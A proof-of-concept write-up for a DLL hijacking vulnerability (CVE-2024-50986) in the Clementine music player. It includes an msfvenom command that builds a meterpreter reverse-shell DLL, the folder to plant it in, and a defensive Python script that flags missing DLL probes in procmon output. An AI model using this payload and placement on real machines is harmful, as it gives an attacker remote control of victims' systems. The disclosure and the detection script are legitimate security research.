
CVE-2024-50986 PoC — Clementine Security Vulnerability

Associated Vulnerability
Title: Clementine Security Vulnerability (CVE-2024-50986)
Description: An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file (DLL Hijacking).
Readme
# CVE-2024-50986: DLL Hijacking Exploit for Clementine

**Description:** An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file.

**Version Affected:** Clementine v.1.3.1

**Researcher:** Utkarsh (r1971d3) [LinkedIn](https://www.linkedin.com/in/r1971d3/)

**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-50986

**Vulnerability Type:** Untrusted Search Path

**Affected Component:** QUSEREX.DLL

## Proof-of-Concept Exploit
### Attack Vector
To exploit this vulnerability, an attacker must craft a malicious DLL named `QUSEREX.DLL` and place it in the directory `C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\`. When the Clementine application is launched, it will load the malicious DLL, executing the attacker's code.
### Description & Usage
1. Use Process Monitor (procmon) with appropriate filters to identify missing DLLs and track where Clementine searches for them on Windows.

![Capture_3](https://github.com/user-attachments/assets/ea567275-8760-4897-a66d-c286d8c94320)


2. The search reveals that the DLL `QUSEREX.DLL` is being looked for in multiple locations, including `C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\`.

![Capture_4](https://github.com/user-attachments/assets/6664d628-bc69-4e3d-91d8-b228fcfce2e2)


3. A malicious DLL is created using msfvenom with the following command:
```bash
sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL
```

![Capture_5](https://github.com/user-attachments/assets/0dcbb555-9416-4714-8621-4e513dadad27)


4. This malicious DLL is placed in the directory `C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\`, where it is successfully loaded by Clementine.

![Capture_6](https://github.com/user-attachments/assets/a57fce43-b572-4eb0-b380-a79afa7d1256)


5. Using msfconsole, a staged payload is sent through the reverse shell, resulting in a meterpreter shell session being obtained in the `C:\Program Files (x86)\Clementine\projectm-presets` directory on the target machine.

![Capture_8](https://github.com/user-attachments/assets/0e826edf-9727-492c-b3c2-876d5b0d13c6)

![Capture_7](https://github.com/user-attachments/assets/f3d22843-f315-42fe-aea3-8f905145ab8a)
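As an added example that is not part of the original PoC, the script below reproduces steps 1 and 2 offline against a Process Monitor CSV export: it lists every DLL that `Clementine.exe` probed and did not find, then flags the probes that fall under a user profile, which is the condition a defender wants to confirm is gone after patching or after locking down `WindowsApps`. The CSV rows, the username `alice` and the "anything under `C:\Users\` is user-writable" heuristic are all constructed assumptions.

```python
import csv
import io
from collections import defaultdict

# Constructed sample of a Process Monitor CSV export (File > Save... > CSV);
# column names match procmon's default export, row contents are made up.
PROCMON_CSV = '''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","Clementine.exe","4120","CreateFile","C:\\Program Files (x86)\\Clementine\\QUSEREX.DLL","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.2","Clementine.exe","4120","CreateFile","C:\\Windows\\System32\\QUSEREX.DLL","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.3","Clementine.exe","4120","CreateFile","C:\\Users\\alice\\AppData\\Local\\Microsoft\\WindowsApps\\QUSEREX.DLL","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.4","Clementine.exe","4120","CreateFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:02.5","Clementine.exe","4120","RegOpenKey","HKLM\\Software\\Clementine","NAME NOT FOUND",""
'''


def find_missing_dll_probes(csv_text, process="Clementine.exe"):
    """Return {DLL name: [paths probed]} for DLLs the process looked for but never found.

    Only CreateFile operations with result NAME NOT FOUND on a .dll path count;
    a SUCCESS row means the loader found the library and stopped searching.
    """
    probes = defaultdict(list)
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process.lower():
            continue
        if row["Operation"] != "CreateFile" or row["Result"] != "NAME NOT FOUND":
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll"):
            continue
        dll_name = path.rsplit("\\", 1)[-1].upper()
        probes[dll_name].append(path)
    return dict(probes)


def user_writable_probes(probes, writable_prefix="c:\\users\\"):
    """Keep only probe locations a standard user can write to.

    Assumption: everything under C:\\Users\\ is writable by the logged-on user;
    on a real host, check the directory ACLs (icacls) instead of trusting the path.
    """
    flagged = {}
    for dll_name, paths in probes.items():
        hits = [p for p in paths if p.lower().startswith(writable_prefix)]
        if hits:
            flagged[dll_name] = hits
    return flagged


if __name__ == "__main__":
    for dll_name, paths in user_writable_probes(find_missing_dll_probes(PROCMON_CSV)).items():
        print(f"{dll_name} is searched for in user-writable location(s):")
        for p in paths:
            print("   ", p)
```

An empty result from `user_writable_probes` on a fresh export is the check that the untrusted search path no longer reaches a directory the user controls.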